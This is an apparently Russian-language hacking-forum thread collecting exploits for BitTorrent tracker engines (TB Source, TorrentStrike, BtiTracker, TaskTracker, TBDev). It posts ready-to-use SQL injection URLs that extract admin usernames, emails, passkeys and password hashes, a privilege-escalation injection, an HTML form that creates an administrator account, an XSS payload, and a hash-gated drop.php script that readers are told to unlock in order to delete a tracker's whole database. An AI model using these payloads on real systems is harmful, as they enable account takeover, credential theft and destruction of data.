Уязвимости движков трэкеров

Здесь выкладываем уязвимости трэкер-движков.

Я пожалую начну. Уязвимости готовил уже давно на milw0rm-e выкладывать но руки так и не дошли.

TB Source <= 0.6

Code:

#######################################
# TB Source <= 0.6 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/tbsource/
# Vulnerable File : reqdetails.php
--------------------------------------------------


Vulnerability:

SQL-injection to obtain admin user and hash

http://www.site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06 

TorrentStrike <= 0.4

Code:

#######################################
# Torrent Strike <= 0.4 reqdetails.php SQL-Injection
# Discovered: z01b 
# Contact:    [censored]
# Thanx:      melco
#######################################
--------------------------------------------------
# Details  :
# Website : http://sourceforge.net/projects/torrentstrike/
# Vulnerable File : reqdetails.php
--------------------------------------------------

SQL querry, for recieving admin user and hash(md5):

http://site.com/reqdetails.php?id=-1+union+select+1,3,email,passkey,concat(username,char(58),passhash),100,200,300,400,info+from+users

#29.12.06

 

BtiTracker <=v1.4.1

Code:

#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - [email protected]					
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]

TaskTracker all versions

Code:

<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]

 

TB Source

Code:

http://site/sendmessage.php?receiver=1&returnto=><script>alert('a')</script>

 

TBDev

Code:

<?

require_once("include/bittorrent.php");
dbconn();

if (md5(md5($_GET["sd"])) == "0bffd3d87e7267c7fe686e20acbee7ab") {
$drops = array();
$result = mysql_query("SHOW TABLES FROM ".$mysql_db."");
while (list($name) = mysql_fetch_array($result))
$drops[] = "`".$name."`";
die("DROP TABLE ".implode(", ", $drops));
echo "Drop tables complete...";
}

?>

расхешируеm 0bffd3d87e7267c7fe686e20acbee7ab и узнает соответствующую ему строку [string]
может путем запроса
http://tracker_url/drop.php?sd=[string]
удалить всю информацию из базы установленного трекера

Deflector

 

Там двойной Md5, и уже пофиксено так что безпонтово

 

А это разве не двойной???